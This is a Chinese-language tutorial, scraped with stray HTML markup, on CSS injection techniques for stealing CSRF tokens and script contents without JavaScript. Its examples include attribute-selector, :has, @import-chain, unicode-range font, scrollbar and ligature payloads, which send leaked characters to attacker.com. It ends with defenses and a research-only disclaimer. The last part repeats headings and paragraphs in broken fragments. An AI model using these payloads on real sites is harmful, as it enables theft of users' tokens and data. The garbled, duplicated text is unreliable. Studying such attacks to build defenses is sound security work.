CSS注入攻击：窃取Token的高级技术解析<\/h1>

概述<\/h2>
CSS注入攻击是一种利用样式表实现数据窃取的攻击技术，它不需要XSS漏洞即可窃取敏感信息（如CSRF token）。由于多数防护系统（如DOMpurify）对样式表限制较少，此类攻击具有较高成功率。<\/p>

核心攻击原理<\/h2>

1. 基础技术组合<\/h3>

属性选择器<\/strong>：使用[value^=x]<\/code>（匹配开头）、[value$=x]<\/code>（匹配结尾）、[value*=x]<\/code>（匹配包含）筛选元素<\/li>

外部资源加载<\/strong>：通过background: url(http:\/\/attacker.com?data=x)<\/code>发送数据到攻击者服务器<\/li> <\/ul> 示例代码：<\/p> input<\/span>[<\/span>value<\/span>^=<\/span>"a"<\/span>]<\/span> { <\/span><\/span> background<\/span>: url(https:\/\/attacker.com?leak=a<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 隐藏字段窃取技术<\/h3> 针对type=hidden<\/code>的input字段，采用以下方法：<\/p> 方法一：相邻选择器<\/strong><\/p> input<\/span>[<\/span>name<\/span>=<\/span>"csrf-token"<\/span>][<\/span>value<\/span>^=<\/span>"a"<\/span>]<\/span> +<\/span> input<\/span> { <\/span><\/span> background<\/span>: url(https:\/\/attacker.com?leak=a<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>方法二：has选择器<\/strong>（现代浏览器支持）<\/p> form<\/span>:has<\/span>(<\/span>input<\/span>[<\/span>name<\/span>=<\/span>"csrf-token"<\/span>][<\/span>value<\/span>^=<\/span>"a"<\/span>])<\/span> { <\/span><\/span> background<\/span>: url(https:\/\/attacker.com?leak=a<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>方法三：显示隐藏元素<\/strong><\/p> head<\/span>,<\/span> meta<\/span> { <\/span><\/span> display<\/span>: block<\/span>; <\/span><\/span>} <\/span><\/span>meta<\/span>[<\/span>name<\/span>=<\/span>"csrf-token"<\/span>][<\/span>content<\/span>^=<\/span>"a"<\/span>]<\/span> { <\/span><\/span> background<\/span>: url(https:\/\/attacker.com?leak=a<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>高效数据提取技术<\/h2> 1. @import链式加载<\/h3> 通过导入链式CSS文件实现自动化字符爆破：<\/p> @import<\/span> url<\/span>(<\/span>https<\/span>:\/\/<\/span>attacker<\/span>.com<\/span>\/<\/span>start<\/span>?<\/span>len<\/span>=<\/span>8<\/span>)<\/span>; <\/span><\/span><\/code><\/pre>服务器端生成链式响应：<\/p> @import<\/span> url<\/span>(<\/span>https<\/span>:\/\/<\/span>attacker<\/span>.com<\/span>\/<\/span>payload<\/span>?<\/span>len<\/span>=<\/span>1<\/span>)<\/span>; <\/span><\/span>@import<\/span> url<\/span>(<\/span>https<\/span>:\/\/<\/span>attacker<\/span>.com<\/span>\/<\/span>payload<\/span>?<\/span>len<\/span>=<\/span>2<\/span>)<\/span>; <\/span><\/span>\/* ...更多导入 *\/<\/span> <\/span><\/span><\/code><\/pre>2. 双向爆破优化<\/h3> 同时匹配开头和结尾字符，提升窃取效率：<\/p> \/* 前缀匹配 *\/<\/span> <\/span><\/span>input<\/span>[<\/span>value<\/span>^=<\/span>"a"<\/span>]<\/span> { background<\/span>: url(https:\/\/attacker.com?pre=a<\/span>); } <\/span><\/span> <\/span><\/span>\/* 后缀匹配 *\/<\/span> <\/span><\/span>input<\/span>[<\/span>value<\/span>$=<\/span>"z"<\/span>]<\/span> { border-image<\/span>: url(https:\/\/attacker.com?post=z<\/span>); } <\/span><\/span><\/code><\/pre>高级窃取技术<\/h2> 1. Unicode范围字体攻击<\/h3> 利用字体加载机制检测特定字符：<\/p> @font-face<\/span> { <\/span><\/span> font-family<\/span>:<\/span> "f1"<\/span>;<\/span> <\/span><\/span> src<\/span>:<\/span> url<\/span>(<\/span>https<\/span>:\/\/<\/span>attacker<\/span>.com<\/span>?<\/span>q<\/span>=<\/span>1<\/span>);<\/span> <\/span><\/span> unicode-range<\/span>:<\/span> U<\/span>+<\/span>31<\/span>;<\/span> <\/span><\/span>} <\/span><\/span>div<\/span> { <\/span><\/span> font-family<\/span>: f1, "Arial"<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 字体高度差异+滚动条检测<\/h3> 技术原理<\/strong>：<\/p> 使用特殊字体（如Comic Sans MS）制造高度差异<\/li> 通过滚动条触发外部资源加载<\/li> <\/ul> 实现步骤<\/strong>：<\/p> @font-face<\/span> { <\/span><\/span> font-family<\/span>:<\/span> "char-A"<\/span>;<\/span> <\/span><\/span> src<\/span>:<\/span> local<\/span>(<\/span>'Comic Sans MS'<\/span>);<\/span> <\/span><\/span> unicode-range<\/span>:<\/span> U<\/span>+<\/span>41<\/span>;<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span>div<\/span> { <\/span><\/span> font-size<\/span>: 0<\/span>px<\/span>; <\/span><\/span> height<\/span>: 40<\/span>px<\/span>; <\/span><\/span> width<\/span>: 20<\/span>px<\/span>; <\/span><\/span> overflow-y<\/span>: auto<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>div<\/span>::first-line<\/span> { <\/span><\/span> font-size<\/span>: 30<\/span>px<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>div<\/span>::-webkit-scrollbar<\/span>:vertical<\/span> { <\/span><\/span> background<\/span>: var<\/span>(--<\/span>leak); <\/span><\/span>} <\/span><\/span><\/code><\/pre>完整攻击动画<\/strong>：<\/p> animation<\/span>:<\/span> <\/span><\/span> loop<\/span> step-end<\/span> 200s<\/span> 0s<\/span>,<\/span> \/* 宽度变化 *\/<\/span> <\/span><\/span> trychar<\/span> step-end<\/span> 2s<\/span> 0s<\/span>;<\/span> \/* 字符测试 *\/<\/span> <\/span><\/span><\/code><\/pre>3. 连字字体攻击<\/h3> 利用连字特性检测字符组合：<\/p> <svg<\/span>> <\/span><\/span> <defs<\/span>> <\/span><\/span> <font<\/span> horiz-adv-x<\/span>=<\/span>"0"<\/span>> <\/span><\/span> <glyph<\/span> unicode<\/span>=<\/span>'"a'<\/span> horiz-adv-x<\/span>=<\/span>"99999"<\/span> d<\/span>=<\/span>"M1 0z"<\/span>\/> <\/span><\/span> <\/font<\/span>> <\/span><\/span> <\/defs<\/span>> <\/span><\/span><\/svg<\/span>> <\/span><\/span> <\/span><\/span><style<\/span>> <\/span><\/span>script<\/span> { <\/span><\/span> display<\/span>: block<\/span>; <\/span><\/span> font-family<\/span>: "hack"<\/span>; <\/span><\/span> overflow-x<\/span>: auto<\/span>; <\/span><\/span>} <\/span><\/span><\/style<\/span>> <\/span><\/span><\/code><\/pre>脚本内容窃取技术<\/h2> 通过显示script标签并应用字体攻击：<\/p> head<\/span>,<\/span> script<\/span> { <\/span><\/span> display<\/span>: block<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>防御措施<\/h2> 输入验证<\/strong>：严格过滤用户输入的样式内容<\/li> CSP策略<\/strong>：实施严格的内容安全策略，限制外部资源加载<\/li> 随机化设计<\/strong>：使用随机变化的类名和ID<\/li> 敏感信息保护<\/strong>：避免将敏感数据直接放在HTML属性中<\/li> 框架保护<\/strong>：使用现代框架的内置防护机制<\/li> <\/ol> 总结<\/h2> CSS注入攻击展示了即使没有JavaScript执行能力，攻击者也能通过样式表实现数据窃取。这些技术利用了浏览器的多种特性，包括属性选择器、字体加载机制、滚动条行为和连字渲染等。防护需要多层次的安全策略，包括输入验证、输出编码和严格的内容安全策略。<\/p> 参考资源<\/h2> Beyond XSS: CSS Injection Attacks<\/li> Stealing Data in Great Style - Securitum Research<\/li> CSS Injection Advanced Techniques<\/li> <\/ol> 注意<\/strong>：本文仅用于安全研究目的，请勿用于非法活动。<\/p>

CSS注入攻击：窃取Token的高级技术解析<\/h1>

概述<\/h2> CSS注入攻击是一种利用样式表实现数据窃取的攻击技术，它不需要XSS漏洞即可窃取敏感信息（如CSRF token）。由于多数防护系统（如DOMpurify）对样式表限制较少，此类攻击具有较高成功率。<\/p>

核心攻击原理<\/h2>

高效数据提取技术<\/h2>

高级窃取技术<\/h2>

参考资源<\/h2> Beyond XSS: CSS Injection Attacks<\/li> Stealing Data in Great Style - Securitum Research<\/li> CSS Injection Advanced Techniques<\/li> <\/ol> 注意<\/strong>：本文仅用于安全研究目的，请勿用于非法活动。<\/p>

概述<\/h2>
CSS注入攻击是一种利用样式表实现数据窃取的攻击技术，它不需要XSS漏洞即可窃取敏感信息（如CSRF token）。由于多数防护系统（如DOMpurify）对样式表限制较少，此类攻击具有较高成功率。<\/p>

参考资源<\/h2>

Beyond XSS: CSS Injection Attacks<\/li>
Stealing Data in Great Style - Securitum Research<\/li>
CSS Injection Advanced Techniques<\/li> <\/ol>
注意<\/strong>：本文仅用于安全研究目的，请勿用于非法活动。<\/p>